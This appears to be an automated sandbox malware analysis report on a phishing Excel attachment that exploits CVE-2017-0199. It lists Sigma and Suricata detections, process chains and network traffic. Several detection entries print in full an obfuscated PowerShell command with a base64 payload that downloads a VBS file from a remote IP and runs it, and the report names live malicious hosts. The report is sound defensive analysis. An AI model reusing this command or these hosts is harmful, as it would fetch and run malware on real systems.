Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3584, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3916, ProcessName: mshta.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4064, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS" , ProcessId: 3364, ProcessName: wscript.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4064, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline", ProcessId: 3212, ProcessName: csc.exe

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 172.67.163.184, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3584, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4064, TargetFilename: C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3584, Protocol: tcp, SourceIp: 172.67.163.184, SourceIsIpv6: false, SourcePort: 443

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4064, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS" , ProcessId: 3364, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4064, TargetFilename: C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3584, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))", CommandLine: POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpO

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4064, TargetFilename: C:\Users\user\AppData\Local\Temp\c0vottoj.rsp.ps1

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4064, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline", ProcessId: 3212, ProcessName: csc.exe

Suricata Signatures

ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T21:43:20.077725+0100	2024197	1	A Network Trojan was detected	107.172.44.175	80	192.168.2.22	49162	TCP
2024-12-12T21:43:24.723202+0100	2024197	1	A Network Trojan was detected	107.172.44.175	80	192.168.2.22	49164	TCP

ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T21:43:20.077574+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49162	107.172.44.175	80	TCP
2024-12-12T21:43:24.722755+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49164	107.172.44.175	80	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T21:43:31.051922+0100	2858795	1	A Network Trojan was detected	192.168.2.22	49165	107.172.44.175	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SOA USD67,353.35.xla.xlsx

ReversingLabs: Detection: 15%

Machine Learning detection for sample

Source: SOA USD67,353.35.xla.xlsx

Joe Sandbox ML: detected

Phishing

Yara detected obfuscated html page

Source: Yara match

File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng[1].hta, type: DROPPED

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.163.184:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.34.183:443 -> 192.168.2.22:49163 version: TLS 1.2

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.pdbhP source: powershell.exe, 00000007.00000002.506734077.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.pdb source: powershell.exe, 00000007.00000002.506734077.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: .pdbo source: powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: res.cloudinary.com
Source: global traffic	DNS query: name: res.cloudinary.com
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 172.67.163.184:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
